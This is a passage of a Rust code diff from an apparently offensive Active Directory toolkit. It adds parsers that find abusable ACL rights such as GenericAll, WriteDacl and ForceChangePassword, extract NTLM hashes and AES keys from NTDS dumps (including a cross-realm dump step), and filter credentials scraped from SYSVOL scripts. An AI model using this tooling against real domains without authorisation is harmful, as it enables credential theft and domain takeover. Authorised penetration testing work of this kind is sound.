"bf9679c0-0de6-11d0-a285-00aa003049e2"; +/// Write-Member (write to member attribute on group) +const GUID_WRITE_MEMBER: &str = "bf9679a8-0de6-11d0-a285-00aa003049e2"; +/// All Extended Rights +#[allow(dead_code)] +const GUID_ALL_EXTENDED_RIGHTS: &str = "00000000-0000-0000-0000-000000000000"; + +// ── Binary parsing helpers ───────────────────────────────────────────────── + +fn read_u8(data: &[u8], offset: usize) -> Option<u8> { + data.get(offset).copied() +} + +fn read_u16_le(data: &[u8], offset: usize) -> Option<u16> { + if offset + 2 > data.len() { + return None; + } + Some(u16::from_le_bytes([data[offset], data[offset + 1]])) +} + +fn read_u32_le(data: &[u8], offset: usize) -> Option<u32> { + if offset + 4 > data.len() { + return None; + } + Some(u32::from_le_bytes([ + data[offset], + data[offset + 1], + data[offset + 2], + data[offset + 3], + ])) +} + +/// Parse a SID from binary data at the given offset. +/// Returns (sid_string, bytes_consumed). +fn parse_sid(data: &[u8], offset: usize) -> Option<(String, usize)> { + let revision = read_u8(data, offset)?; + let sub_authority_count = read_u8(data, offset + 1)?
as usize; + + if offset + 8 + sub_authority_count * 4 > data.len() { + return None; + } + + // IdentifierAuthority is 6 bytes big-endian + let auth_bytes = &data[offset + 2..offset + 8]; + let authority = if auth_bytes[0] == 0 && auth_bytes[1] == 0 { + // Fits in a u32 — use the last 4 bytes + u32::from_be_bytes([auth_bytes[2], auth_bytes[3], auth_bytes[4], auth_bytes[5]]) as u64 + } else { + // Full 48-bit authority + ((auth_bytes[0] as u64) << 40) + | ((auth_bytes[1] as u64) << 32) + | ((auth_bytes[2] as u64) << 24) + | ((auth_bytes[3] as u64) << 16) + | ((auth_bytes[4] as u64) << 8) + | (auth_bytes[5] as u64) + }; + + let mut sid = format!("S-{revision}-{authority}"); + for i in 0..sub_authority_count { + let sub_auth = read_u32_le(data, offset + 8 + i * 4)?; + sid.push_str(&format!("-{sub_auth}")); + } + + let consumed = 8 + sub_authority_count * 4; + Some((sid, consumed)) +} + +/// Parse a GUID from 16 bytes in mixed-endian format (as stored in AD). +fn parse_guid(data: &[u8], offset: usize) -> Option<String> { + if offset + 16 > data.len() { + return None; + } + let d1 = read_u32_le(data, offset)?; + let d2 = read_u16_le(data, offset + 4)?; + let d3 = read_u16_le(data, offset + 6)?; + let d4 = &data[offset + 8..offset + 16]; + Some(format!( + "{:08x}-{:04x}-{:04x}-{:02x}{:02x}-{:02x}{:02x}{:02x}{:02x}{:02x}{:02x}", + d1, d2, d3, d4[0], d4[1], d4[2], d4[3], d4[4], d4[5], d4[6], d4[7] + )) +} + +// ── ACE types ────────────────────────────────────────────────────────────── + +const ACCESS_ALLOWED_ACE_TYPE: u8 = 0x00; +const ACCESS_ALLOWED_OBJECT_ACE_TYPE: u8 = 0x05; + +/// A parsed ACE with the information we care about. +#[derive(Debug)] +struct ParsedAce { + trustee_sid: String, + access_mask: u32, + object_type_guid: Option<String>, +} + +/// Classify an ACE into a vulnerability type name, if it's dangerous. +fn classify_ace(ace: &ParsedAce) -> Vec<&'static str> { + let mask = ace.access_mask; + let mut types = Vec::new(); + + // GenericAll — full control + if mask & GENERIC_ALL != 0 || mask == FULL_CONTROL { + types.push("genericall"); + return types; // GenericAll subsumes everything + } + + // GenericWrite + if mask & GENERIC_WRITE != 0 { + types.push("genericwrite"); + } + + // WriteDacl + if mask & WRITE_DACL != 0 { + types.push("writedacl"); + } + + // WriteOwner + if mask & WRITE_OWNER != 0 { + types.push("writeowner"); + } + + // Object-type specific rights + if let Some(ref guid) = ace.object_type_guid { + let guid_lower = guid.to_lowercase(); + if guid_lower == GUID_FORCE_CHANGE_PASSWORD && (mask & ADS_RIGHT_DS_CONTROL_ACCESS != 0) { + types.push("forcechangepassword"); + } + if guid_lower == GUID_SELF_MEMBERSHIP && (mask & ADS_RIGHT_DS_SELF != 0) { + types.push("self_membership"); + } + if guid_lower == GUID_WRITE_MEMBER && (mask & ADS_RIGHT_DS_WRITE_PROP != 0) { + types.push("write_membership"); + } + } + + // AllExtendedRights (no object type restriction or null GUID) + if mask & ADS_RIGHT_DS_CONTROL_ACCESS != 0 && ace.object_type_guid.is_none() { + types.push("allextendedrights"); + } + + // WriteProperty with no specific object type + if mask & ADS_RIGHT_DS_WRITE_PROP != 0 { + if let Some(ref guid) = ace.object_type_guid { + if guid.to_lowercase() != GUID_WRITE_MEMBER { + types.push("writeproperty"); + } + } else { + types.push("writeproperty"); + } + } + + types +} +
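To ground the byte layout `parse_sid` walks, a worked example using the well-known BUILTIN\Administrators SID (the byte array is hand-assembled for illustration):

```rust
// S-1-5-32-544 in binary: revision=1, 2 sub-authorities,
// IdentifierAuthority = {0,0,0,0,0,5}, then 32 and 544 as u32 little-endian.
let sid_bytes: [u8; 16] = [
    0x01, 0x02,                         // revision, sub-authority count
    0x00, 0x00, 0x00, 0x00, 0x00, 0x05, // IdentifierAuthority (big-endian)
    0x20, 0x00, 0x00, 0x00,             // 32
    0x20, 0x02, 0x00, 0x00,             // 544 (0x220)
];
let (sid, consumed) = parse_sid(&sid_bytes, 0).unwrap();
assert_eq!(sid, "S-1-5-32-544");
assert_eq!(consumed, 16); // 8 header bytes + 2 * 4 sub-authority bytes
assert_eq!(well_known_sid(&sid), Some("BUILTIN\\Administrators"));
```

+/// Parse a single ACE from binary data. +/// Returns (ParsedAce, total_ace_size).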
+fn parse_ace(data: &[u8], offset: usize) -> Option<(ParsedAce, usize)> {
+    let ace_type = read_u8(data, offset)?;
+    let _ace_flags = read_u8(data, offset + 1)?;
+    let ace_size = read_u16_le(data, offset + 2)? as usize;
+
+    if offset + ace_size > data.len() || ace_size < 8 {
+        return None;
+    }
+
+    match ace_type {
+        ACCESS_ALLOWED_ACE_TYPE => {
+            let access_mask = read_u32_le(data, offset + 4)?;
+            let (sid, _) = parse_sid(data, offset + 8)?;
+            Some((
+                ParsedAce {
+                    trustee_sid: sid,
+                    access_mask,
+                    object_type_guid: None,
+                },
+                ace_size,
+            ))
+        }
+        ACCESS_ALLOWED_OBJECT_ACE_TYPE => {
+            let access_mask = read_u32_le(data, offset + 4)?;
+            let flags = read_u32_le(data, offset + 8)?;
+
+            let mut guid_offset = offset + 12;
+            let object_type_guid = if flags & 0x01 != 0 {
+                let guid = parse_guid(data, guid_offset)?;
+                guid_offset += 16;
+                Some(guid)
+            } else {
+                None
+            };
+
+            // Skip InheritedObjectType if present
+            if flags & 0x02 != 0 {
+                guid_offset += 16;
+            }
+
+            let (sid, _) = parse_sid(data, guid_offset)?;
+            Some((
+                ParsedAce {
+                    trustee_sid: sid,
+                    access_mask,
+                    object_type_guid,
+                },
+                ace_size,
+            ))
+        }
+        _ => {
+            // Skip unknown ACE types
+            Some((
+                ParsedAce {
+                    trustee_sid: String::new(),
+                    access_mask: 0,
+                    object_type_guid: None,
+                },
+                ace_size,
+            ))
+        }
+    }
+}
+
+/// Parse a SECURITY_DESCRIPTOR in self-relative format and extract DACL ACEs.
+///
+/// Returns a list of (trustee_sid, vuln_type) pairs for dangerous ACEs.
+pub fn parse_security_descriptor(data: &[u8]) -> Vec<(String, String)> {
+    if data.len() < 20 {
+        return Vec::new();
+    }
+
+    let _revision = read_u8(data, 0);
+    let _sbz1 = read_u8(data, 1);
+    let control = read_u16_le(data, 2).unwrap_or(0);
+
+    // Check SE_DACL_PRESENT (bit 2)
+    if control & 0x0004 == 0 {
+        return Vec::new();
+    }
+
+    // SE_SELF_RELATIVE check (bit 15) — we only handle self-relative
+    if control & 0x8000 == 0 {
+        return Vec::new();
+    }
+
+    let dacl_offset = read_u32_le(data, 16).unwrap_or(0) as usize;
+    if dacl_offset == 0 || dacl_offset >= data.len() {
+        return Vec::new();
+    }
+
+    // DACL header: Revision(1) + Sbz1(1) + AclSize(2) + AceCount(2) + Sbz2(2)
+    if dacl_offset + 8 > data.len() {
+        return Vec::new();
+    }
+
+    let ace_count = read_u16_le(data, dacl_offset + 4).unwrap_or(0) as usize;
+
+    let mut results = Vec::new();
+    let mut ace_offset = dacl_offset + 8; // skip ACL header
+
+    for _ in 0..ace_count {
+        if ace_offset >= data.len() {
+            break;
+        }
+        match parse_ace(data, ace_offset) {
+            Some((ace, size)) => {
+                if !ace.trustee_sid.is_empty() {
+                    for vuln_type in classify_ace(&ace) {
+                        results.push((ace.trustee_sid.clone(), vuln_type.to_string()));
+                    }
+                }
+                ace_offset += size;
+            }
+            None => break,
+        }
+    }
+
+    results
+}
+
+/// Parse ldapsearch output containing base64-encoded nTSecurityDescriptor values.
+///
+/// Expects output in ldapsearch format:
+/// ```text
+/// dn: CN=someuser,DC=contoso,DC=local
+/// sAMAccountName: someuser
+/// nTSecurityDescriptor:: <base64 blob>
+/// ```
+///
+/// Returns vulnerability discoveries as JSON values.
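+/// Each discovery mirrors the JSON built below; an illustrative entry (names
+/// are hypothetical) looks like `{"vuln_id": "acl_genericall_jdoe_svc-sql",
+/// "vuln_type": "genericall", "source": "jdoe", "target": "svc-sql",
+/// "target_type": "User", ...}`.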
+pub fn parse_acl_enumeration(output: &str, params: &Value) -> Vec<Value> {
+    use std::collections::HashMap;
+
+    let domain = params.get("domain").and_then(|v| v.as_str()).unwrap_or("");
+    let target_ip = params
+        .get("target")
+        .or_else(|| params.get("target_ip"))
+        .and_then(|v| v.as_str())
+        .unwrap_or("");
+
+    // Build a SID → sAMAccountName map from the output itself
+    let mut sid_to_name: HashMap<String, String> = HashMap::new();
+    let mut vulns = Vec::new();
+
+    // First pass: collect all objects with their sAMAccountName and objectSid
+    struct LdapObject {
+        sam_account_name: String,
+        object_class: String, // user, group, computer
+        ntsd_base64: String,
+        object_sid: String,
+    }
+
+    let mut objects: Vec<LdapObject> = Vec::new();
+    let mut current = LdapObject {
+        sam_account_name: String::new(),
+        object_class: String::new(),
+        ntsd_base64: String::new(),
+        object_sid: String::new(),
+    };
+    let mut in_ntsd = false;
+    let mut ntsd_buf = String::new();
+
+    for line in output.lines() {
+        let line = line.trim_end();
+
+        if line.starts_with("dn: ") || (line.is_empty() && !current.sam_account_name.is_empty()) {
+            // Flush current
+            if in_ntsd {
+                current.ntsd_base64 = ntsd_buf.clone();
+                in_ntsd = false;
+                ntsd_buf.clear();
+            }
+            if !current.sam_account_name.is_empty() {
+                objects.push(current);
+            }
+            current = LdapObject {
+                sam_account_name: String::new(),
+                object_class: String::new(),
+                ntsd_base64: String::new(),
+                object_sid: String::new(),
+            };
+            continue;
+        }
+
+        // Handle base64 continuation lines (start with space)
+        if in_ntsd {
+            if line.starts_with(' ') {
+                ntsd_buf.push_str(line.trim());
+                continue;
+            } else {
+                current.ntsd_base64 = ntsd_buf.clone();
+                in_ntsd = false;
+                ntsd_buf.clear();
+            }
+        }
+
+        if let Some(val) = line.strip_prefix("sAMAccountName: ") {
+            current.sam_account_name = val.trim().to_string();
+        } else if let Some(val) = line.strip_prefix("objectClass: ") {
+            let val = val.trim().to_lowercase();
+            // Keep the most specific class
+            if val == "user" || val == "computer" || val == "group" {
+                current.object_class = val;
+            }
+        } else if let Some(val) = line.strip_prefix("objectSid:: ") {
+            // Base64-encoded SID
+            if let Ok(bytes) = base64_decode(val.trim()) {
+                if let Some((sid, _)) = parse_sid(&bytes, 0) {
+                    current.object_sid = sid;
+                }
+            }
+        } else if let Some(val) = line.strip_prefix("objectSid: ") {
+            // String SID
+            current.object_sid = val.trim().to_string();
+        } else if let Some(val) = line.strip_prefix("nTSecurityDescriptor:: ") {
+            ntsd_buf = val.trim().to_string();
+            in_ntsd = true;
+        } else if let Some(val) = line.strip_prefix("nTSecurityDescriptor: ") {
+            // Non-base64 (shouldn't happen but handle it)
+            current.ntsd_base64 = val.trim().to_string();
+        }
+    }
+    // Flush last object
+    if in_ntsd {
+        current.ntsd_base64 = ntsd_buf;
+    }
+    if !current.sam_account_name.is_empty() {
+        objects.push(current);
+    }
+
+    // Build SID map
+    for obj in &objects {
+        if !obj.object_sid.is_empty() && !obj.sam_account_name.is_empty() {
+            sid_to_name.insert(obj.object_sid.clone(), obj.sam_account_name.clone());
+        }
+    }
+
+    // Second pass: parse each nTSecurityDescriptor and extract dangerous ACEs
+    for obj in &objects {
+        if obj.ntsd_base64.is_empty() {
+            continue;
+        }
+
+        let sd_bytes = match base64_decode(&obj.ntsd_base64) {
+            Ok(b) => b,
+            Err(_) => continue,
+        };
+
+        let aces = parse_security_descriptor(&sd_bytes);
+        for (trustee_sid, vuln_type) in &aces {
+            // Resolve trustee SID to name
+            let source_name = sid_to_name
+                .get(trustee_sid)
+                .map(|s| s.as_str())
+                .or_else(|| well_known_sid(trustee_sid))
+                .unwrap_or(trustee_sid);
+
+            // Skip well-known system SIDs and high-privilege groups that aren't
+            // actionable (you'd already need DA to abuse them).
+            let source_lower = source_name.to_lowercase();
+            if matches!(
+                source_name,
+                "SYSTEM"
+                    | "BUILTIN\\Administrators"
+                    | "BUILTIN\\Users"
+                    | "SELF"
+                    | "Nobody"
+                    | "ANONYMOUS LOGON"
+            ) || source_lower == "administrators"
+                || source_lower == "domain admins"
+                || source_lower == "enterprise admins"
+                || source_lower == "key admins"
+                || source_lower == "enterprise key admins"
+                || source_lower == "account operators"
+                || source_lower == "domain controllers"
+                || source_lower == "enterprise domain controllers"
+            {
+                continue;
+            }
+
+            // Skip if source == target (self-permissions)
+            if source_name.eq_ignore_ascii_case(&obj.sam_account_name) {
+                continue;
+            }
+
+            let target_type = match obj.object_class.as_str() {
+                "user" => "User",
+                "group" => "Group",
+                "computer" => "Computer",
+                _ => "Unknown",
+            };
+
+            let vuln_id = format!(
+                "acl_{}_{}_{}",
+                vuln_type,
+                source_name.to_lowercase().replace(' ', "_"),
+                obj.sam_account_name.to_lowercase().replace('$', "")
+            );
+
+            vulns.push(json!({
+                "vuln_id": vuln_id,
+                "vuln_type": vuln_type,
+                "source": source_name,
+                "target": obj.sam_account_name,
+                "target_type": target_type,
+                "target_ip": target_ip,
+                "domain": domain,
+                "source_domain": domain,
+                "details": {
+                    "trustee_sid": trustee_sid,
+                    "source": source_name,
+                    "target": obj.sam_account_name,
+                    "target_type": target_type,
+                    "domain": domain,
+                    "source_domain": domain,
+                    "description": format!(
+                        "{} has {} on {} ({})",
+                        source_name, vuln_type, obj.sam_account_name, target_type
+                    ),
+                },
+            }));
+        }
+    }
+
+    vulns
+}
+
+/// Simple base64 decoder (no external dependency).
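+/// e.g. `base64_decode("AQIDBA==")` yields `Ok(vec![0x01, 0x02, 0x03, 0x04])`;
+/// whitespace is stripped first, so ldapsearch's folded continuation lines
+/// decode the same as a single-line value.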
+fn base64_decode(input: &str) -> Result<Vec<u8>, &'static str> {
+    // Strip whitespace
+    let clean: String = input.chars().filter(|c| !c.is_whitespace()).collect();
+    if clean.is_empty() {
+        return Ok(Vec::new());
+    }
+
+    let mut output = Vec::with_capacity(clean.len() * 3 / 4);
+    let mut buf: u32 = 0;
+    let mut bits: u32 = 0;
+
+    for ch in clean.chars() {
+        let val = match ch {
+            'A'..='Z' => ch as u32 - 'A' as u32,
+            'a'..='z' => ch as u32 - 'a' as u32 + 26,
+            '0'..='9' => ch as u32 - '0' as u32 + 52,
+            '+' => 62,
+            '/' => 63,
+            '=' => continue, // padding
+            _ => return Err("invalid base64 character"),
+        };
+        buf = (buf << 6) | val;
+        bits += 6;
+        if bits >= 8 {
+            bits -= 8;
+            output.push((buf >> bits) as u8);
+            buf &= (1 << bits) - 1;
+        }
+    }
+
+    Ok(output)
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn parse_sid_wellknown() {
+        // S-1-5-18 (SYSTEM): revision=1, subauth_count=1, authority=5, subauth=18
+        let bytes = [
+            0x01, // revision
+            0x01, // sub authority count
+            0x00, 0x00, 0x00, 0x00, 0x00, 0x05, // authority = 5
+            0x12, 0x00, 0x00, 0x00, // sub authority = 18
+        ];
+        let (sid, consumed) = parse_sid(&bytes, 0).unwrap();
+        assert_eq!(sid, "S-1-5-18");
+        assert_eq!(consumed, 12);
+    }
+
+    #[test]
+    fn parse_sid_domain_user() {
+        // S-1-5-21-xxx-xxx-xxx-1001
+        let bytes = [
+            0x01, // revision
+            0x04, // sub authority count = 4
+            0x00, 0x00, 0x00, 0x00, 0x00, 0x05, // authority = 5
+            0x15, 0x00, 0x00, 0x00, // 21
+            0x01, 0x00, 0x00, 0x00, // 1
+            0x02, 0x00, 0x00, 0x00, // 2
+            0xE9, 0x03, 0x00, 0x00, // 1001
+        ];
+        let (sid, _) = parse_sid(&bytes, 0).unwrap();
+        assert_eq!(sid, "S-1-5-21-1-2-1001");
+    }
+
+    #[test]
+    fn parse_guid_format() {
+        // A known GUID: 00299570-246d-11d0-a768-00aa006e0529
+        let bytes = [
+            0x70, 0x95, 0x29, 0x00, // d1 = 0x00299570 LE
+            0x6d, 0x24, // d2 = 0x246d LE
+            0xd0, 0x11, // d3 = 0x11d0 LE
+            0xa7, 0x68, 0x00, 0xaa, 0x00, 0x6e, 0x05, 0x29, // d4
+        ];
+        let guid = parse_guid(&bytes, 0).unwrap();
+        assert_eq!(guid, "00299570-246d-11d0-a768-00aa006e0529");
+    }
+
+    #[test]
+    fn base64_decode_simple() {
+        let decoded = base64_decode("AQAAAA==").unwrap();
+        assert_eq!(decoded, vec![0x01, 0x00, 0x00, 0x00]);
+    }
+
+    #[test]
+    fn base64_decode_empty() {
+        let decoded = base64_decode("").unwrap();
+        assert!(decoded.is_empty());
+    }
+
+    #[test]
+    fn classify_generic_all() {
+        let ace = ParsedAce {
+            trustee_sid: "S-1-5-21-1-2-1001".into(),
+            access_mask: GENERIC_ALL,
+            object_type_guid: None,
+        };
+        let types = classify_ace(&ace);
+        assert_eq!(types, vec!["genericall"]);
+    }
+
+    #[test]
+    fn classify_full_control() {
+        let ace = ParsedAce {
+            trustee_sid: "S-1-5-21-1-2-1001".into(),
+            access_mask: FULL_CONTROL,
+            object_type_guid: None,
+        };
+        let types = classify_ace(&ace);
+        assert_eq!(types, vec!["genericall"]);
+    }
+
+    #[test]
+    fn classify_write_dacl() {
+        let ace = ParsedAce {
+            trustee_sid: "S-1-5-21-1-2-1001".into(),
+            access_mask: WRITE_DACL,
+            object_type_guid: None,
+        };
+        let types = classify_ace(&ace);
+        assert!(types.contains(&"writedacl"));
+    }
+
+    #[test]
+    fn classify_write_owner() {
+        let ace = ParsedAce {
+            trustee_sid: "S-1-5-21-1-2-1001".into(),
+            access_mask: WRITE_OWNER,
+            object_type_guid: None,
+        };
+        let types = classify_ace(&ace);
+        assert!(types.contains(&"writeowner"));
+    }
+
+    #[test]
+    fn classify_force_change_password() {
+        let ace = ParsedAce {
+            trustee_sid: "S-1-5-21-1-2-1001".into(),
+            access_mask: ADS_RIGHT_DS_CONTROL_ACCESS,
+            object_type_guid: Some(GUID_FORCE_CHANGE_PASSWORD.into()),
+        };
+        let types = classify_ace(&ace);
+        assert!(types.contains(&"forcechangepassword"));
+    }
classify_ace(&ace); + assert!(types.contains(&"forcechangepassword")); + } + + #[test] + fn classify_self_membership() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: ADS_RIGHT_DS_SELF, + object_type_guid: Some(GUID_SELF_MEMBERSHIP.into()), + }; + let types = classify_ace(&ace); + assert!(types.contains(&"self_membership")); + } + + #[test] + fn classify_generic_write() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: GENERIC_WRITE, + object_type_guid: None, + }; + let types = classify_ace(&ace); + assert!(types.contains(&"genericwrite")); + } + + #[test] + fn classify_no_dangerous_perms() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: 0x00000001, // just read + object_type_guid: None, + }; + let types = classify_ace(&ace); + assert!(types.is_empty()); + } + + #[test] + fn parse_security_descriptor_too_short() { + let result = parse_security_descriptor(&[0x01, 0x00]); + assert!(result.is_empty()); + } + + #[test] + fn well_known_sids() { + assert_eq!(well_known_sid("S-1-5-18"), Some("SYSTEM")); + assert_eq!(well_known_sid("S-1-1-0"), Some("Everyone")); + assert_eq!( + well_known_sid("S-1-5-32-544"), + Some("BUILTIN\\Administrators") + ); + assert_eq!(well_known_sid("S-1-5-21-custom"), None); + } + + #[test] + fn parse_acl_enumeration_empty() { + let vulns = parse_acl_enumeration("", &serde_json::json!({"domain": "contoso.local"})); + assert!(vulns.is_empty()); + } + + #[test] + fn parse_security_descriptor_minimal_valid() { + // Construct a minimal self-relative SD with DACL present, 0 ACEs + let mut sd = [0u8; 24]; + sd[0] = 1; // revision + // control: SE_DACL_PRESENT (0x0004) | SE_SELF_RELATIVE (0x8000) + sd[2] = 0x04; + sd[3] = 0x80; + // DACL offset at byte 16 (LE u32) + sd[16] = 20; // DACL starts at offset 20 + // DACL header at offset 20: revision=2, sbz=0, size=8, ace_count=0 + sd[20] = 2; // ACL revision + sd[22] = 8; // ACL size (just header) + sd[24..].iter().for_each(|_| {}); // pad isn't needed, we have exact size + + // Actually need 28 bytes total (20 for SD header + 8 for DACL header) + let mut sd = vec![0u8; 28]; + sd[0] = 1; + sd[2] = 0x04; + sd[3] = 0x80; + sd[16] = 20; + sd[20] = 2; + sd[22] = 8; + // ace_count at offset 24 = 0 + + let result = parse_security_descriptor(&sd); + assert!(result.is_empty()); + } +} diff --git a/ares-tools/src/parsers/secrets.rs b/ares-tools/src/parsers/secrets.rs index 4b5f2080..323db87a 100644 --- a/ares-tools/src/parsers/secrets.rs +++ b/ares-tools/src/parsers/secrets.rs @@ -2,6 +2,30 @@ use serde_json::{json, Value}; +/// Strip the `SMB ` framing that `nxc smb` prepends to every +/// line of pass-through output. If the line doesn't have the framing, return it +/// untouched. Needed because `forge_inter_realm_and_dump` shells out to +/// `nxc smb --ntds` instead of `impacket-secretsdump` (the latter's DRSUAPI +/// bind rejects cross-realm Kerberos credentials), so the secretsdump parser +/// has to handle nxc-framed lines too. +fn strip_nxc_framing(line: &str) -> &str { + let trimmed = line.trim_start(); + if !trimmed.starts_with("SMB ") && !trimmed.starts_with("SMB\t") { + return line; + } + // Walk through the first 4 whitespace-delimited tokens (SMB, IP, PORT, HOST) + // and return everything after the 4th token's trailing whitespace. 
+    let mut rest = trimmed;
+    for _ in 0..4 {
+        rest = rest.trim_start();
+        match rest.find(char::is_whitespace) {
+            Some(end) => rest = &rest[end..],
+            None => return line,
+        }
+    }
+    rest.trim_start()
+}
+
 pub fn parse_secretsdump(output: &str, params: &Value) -> (Vec<Value>, Vec<Value>) {
     // Prefer target_domain (the domain being dumped) over domain (auth credential's domain)
     // to correctly attribute hashes when authenticating cross-domain.
@@ -14,8 +38,34 @@ pub fn parse_secretsdump(output: &str, params: &Value) -> (Vec<Value>, Vec<Value>) {
+    // First pass: collect AES keys so they can be attached to the matching
+    // NTLM hash entries. Lines look like "username:aes256-cts-hmac-sha1-96:<key>" or
+    // "domain.local/user:aes256-cts-hmac-sha1-96:<key>"
+    let mut aes_keys: std::collections::HashMap<String, String> = std::collections::HashMap::new();
+    for raw_line in output.lines() {
+        let line = strip_nxc_framing(raw_line).trim();
+        if line.is_empty() || line.starts_with('[') {
+            continue;
+        }
+        if let Some(rest) = line.split_once(":aes256-cts-hmac-sha1-96:") {
+            let raw_user = rest.0;
+            let aes_hex = rest.1.trim();
+            if aes_hex.is_empty() || !aes_hex.chars().all(|c| c.is_ascii_hexdigit()) {
+                continue;
+            }
+            let username = raw_user
+                .rsplit_once(['\\', '/'])
+                .map(|(_, u)| u)
+                .unwrap_or(raw_user)
+                .to_string();
+            aes_keys.insert(username.to_lowercase(), aes_hex.to_lowercase());
+        }
+    }
+
+    for raw_line in output.lines() {
+        let line = strip_nxc_framing(raw_line).trim();
 
         // NTLM hash format: "username:RID:LMhash:NThash:::"
         // or "DOMAIN\username:RID:LMhash:NThash:::"
@@ -23,13 +73,14 @@ pub fn parse_secretsdump(output: &str, params: &Value) -> (Vec<Value>, Vec<Value>) {
         let parts: Vec<&str> = line.split(':').collect();
         if parts.len() >= 4 {
             let raw_user = parts[0];
-            let (user_domain, username) = if raw_user.contains('\\') {
-                let split: Vec<&str> = raw_user.splitn(2, '\\').collect();
-                let netbios = split[0];
-                // Resolve NetBIOS domain prefix to FQDN using target_domain.
-                // e.g. "CONTOSO" → "contoso.local" when target_domain="contoso.local"
-                let resolved = resolve_netbios_to_fqdn(netbios, domain);
-                (resolved, split[1].to_string())
+            let (user_domain, username) = if let Some(idx) = raw_user.find(['\\', '/']) {
+                let prefix = &raw_user[..idx];
+                let user = &raw_user[idx + 1..];
+                // Resolve NetBIOS prefix to FQDN using target_domain.
+                // raiseChild emits "domain.local/user" (slash + FQDN),
+                // standard secretsdump emits "DOMAIN\\user" (backslash + NetBIOS).
+                let resolved = resolve_netbios_to_fqdn(prefix, domain);
+                (resolved, user.to_string())
             } else {
                 (domain.to_string(), raw_user.to_string())
             };
@@ -40,13 +91,17 @@ pub fn parse_secretsdump(output: &str, params: &Value) -> (Vec<Value>, Vec<Value>) {
+
+    #[test]
+    fn parse_secretsdump_strips_nxc_framing() {
+        // nxc --ntds output keeps the "SMB <ip> <port> <host> " prefix.
+        let output = "\
+SMB 192.168.58.10 445 DC01 [*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
+SMB 192.168.58.10 445 DC01 contoso.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
+SMB 192.168.58.10 445 DC01 contoso.local/Administrator:500:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
+SMB 192.168.58.10 445 DC01 [+] Dumped 2 NTDS hashes";
+        let params = json!({"target_domain": "contoso.local"});
+        let (hashes, _) = parse_secretsdump(output, &params);
+        assert_eq!(hashes.len(), 2);
+        assert_eq!(hashes[0]["username"], "krbtgt");
+        assert_eq!(hashes[0]["domain"], "contoso.local");
+        assert!(hashes[0]["hash_value"]
+            .as_str()
+            .unwrap()
+            .contains("11111111111111111111111111111111"));
+        assert_eq!(hashes[1]["username"], "Administrator");
+    }
+
+    #[test]
+    fn parse_secretsdump_strips_nxc_framing_with_aes_keys() {
+        // nxc-framed output should still let AES-key collection work.
+ let output = "\ +SMB 192.168.58.20 445 DC02 FABRIKAM\\CONTOSO$:1107:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333::: +SMB 192.168.58.20 445 DC02 FABRIKAM\\CONTOSO$:aes256-cts-hmac-sha1-96:4444444444444444444444444444444444444444444444444444444444444444"; + let params = json!({"target_domain": "fabrikam.local"}); + let (hashes, _) = parse_secretsdump(output, ¶ms); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0]["username"], "CONTOSO$"); + assert_eq!( + hashes[0]["aes_key"], + "4444444444444444444444444444444444444444444444444444444444444444" + ); + } } diff --git a/ares-tools/src/parsers/spider.rs b/ares-tools/src/parsers/spider.rs index cdca3af4..e7232160 100644 --- a/ares-tools/src/parsers/spider.rs +++ b/ares-tools/src/parsers/spider.rs @@ -106,7 +106,7 @@ pub fn parse_spider_credentials(output: &str, params: &Value) -> Vec { .unwrap_or(domain); let username = &cap[2]; let password = &cap[3]; - if is_plausible_password(password) { + if is_plausible_password(password) && is_plausible_username(username) { creds.push(json!({ "username": username, "password": password, @@ -120,6 +120,7 @@ pub fn parse_spider_credentials(output: &str, params: &Value) -> Vec { let usernames: Vec = RE_USERNAME .captures_iter(content) .filter_map(|cap| first_capture(&cap, &[1, 2, 3])) + .filter(|u| is_plausible_username(u)) .collect(); let passwords: Vec = RE_PASSWORD @@ -157,6 +158,7 @@ pub fn parse_spider_credentials(output: &str, params: &Value) -> Vec { let ps_users: Vec = RE_PS_PARAM_USER .captures_iter(content) .filter_map(|cap| first_capture(&cap, &[1, 2, 3])) + .filter(|u| is_plausible_username(u)) .collect(); let ps_passes: Vec = RE_PS_PARAM_PASS @@ -201,7 +203,7 @@ pub fn parse_spider_credentials(output: &str, params: &Value) -> Vec { } /// Quick check that a value looks like a plausible password (not a variable ref, -/// not too short, not a common placeholder). +/// not a PowerShell cmdlet, not too short, not a common placeholder). fn is_plausible_password(s: &str) -> bool { if s.len() < 2 { return false; @@ -210,6 +212,11 @@ fn is_plausible_password(s: &str) -> bool { if s.starts_with('$') || s.starts_with('%') { return false; } + // Skip PowerShell cmdlets (Verb-Noun) like `New-Object`, `Get-Credential`. + // Captured when scripts assign cmdlet output to $password without quotes. + if PS_CMDLET_RE.is_match(s) { + return false; + } // Skip common placeholders let lower = s.to_lowercase(); !matches!( @@ -218,6 +225,30 @@ fn is_plausible_password(s: &str) -> bool { ) } +/// Quick check that a value looks like a plausible username (not a variable +/// reference, property access, or scriptblock fragment). +fn is_plausible_username(s: &str) -> bool { + if s.len() < 2 { + return false; + } + // PowerShell variable / property access: `$x`, `$x.y`, `$env:X` + if s.starts_with('$') || s.starts_with('%') { + return false; + } + // Reject anything containing characters that don't appear in real + // usernames but DO appear in scriptblock fragments / expressions. + if s.chars() + .any(|c| matches!(c, '(' | ')' | '{' | '}' | '"' | '\'' | ';' | ' ')) + { + return false; + } + true +} + +/// PowerShell cmdlet shape: `Verb-Noun` with TitleCase verb and noun. 
+static PS_CMDLET_RE: LazyLock<Regex> =
+    LazyLock::new(|| Regex::new(r"^[A-Z][a-zA-Z]+-[A-Z][a-zA-Z]+$").unwrap());
+
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -314,6 +345,29 @@ $pass = "P@ssw0rd"
         assert!(creds.is_empty());
     }
 
+    #[test]
+    fn rejects_powershell_expression_username_and_cmdlet_password() {
+        // Real-world false positive that produced
+        // `contoso.local\$user.username:New-Object` in loot. The username is a
+        // PowerShell property access expression, the "password" is a cmdlet
+        // name (Verb-Noun). Neither is a literal credential.
+        let output = r#"
+--- SYSVOL/scripts/userInfo.ps1 ---
+$user = $User.UserName
